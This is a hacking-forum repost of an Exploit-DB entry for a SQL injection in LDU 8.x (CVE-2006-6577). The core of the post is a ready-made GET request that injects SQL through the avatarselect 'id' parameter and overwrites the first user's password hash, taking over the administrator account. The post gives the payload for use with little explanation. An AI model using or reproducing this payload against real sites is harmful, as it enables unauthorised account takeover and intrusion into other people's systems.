Exploit LDU 8.x - avatarselect id SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2819
Проверка EDB
  1. Пройдено
Автор
NUKEDX
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6577
Дата публикации
2006-11-21
Код:
LDU <= 8.x Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: [email protected] web: http://www.nukedx.com
Original advisory can be found at: http://www.nukedx.com/?viewdoc=51
----
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of LDU to 123456 
The XVALUE comes with your avatarselect link it's special to everyuser in LDU.
For using this vulnerability you must be logged in to LDU... 

# nukedx.com [2006-11-21]

# milw0rm.com [2006-11-21]
 
Источник
www.exploit-db.com

Похожие темы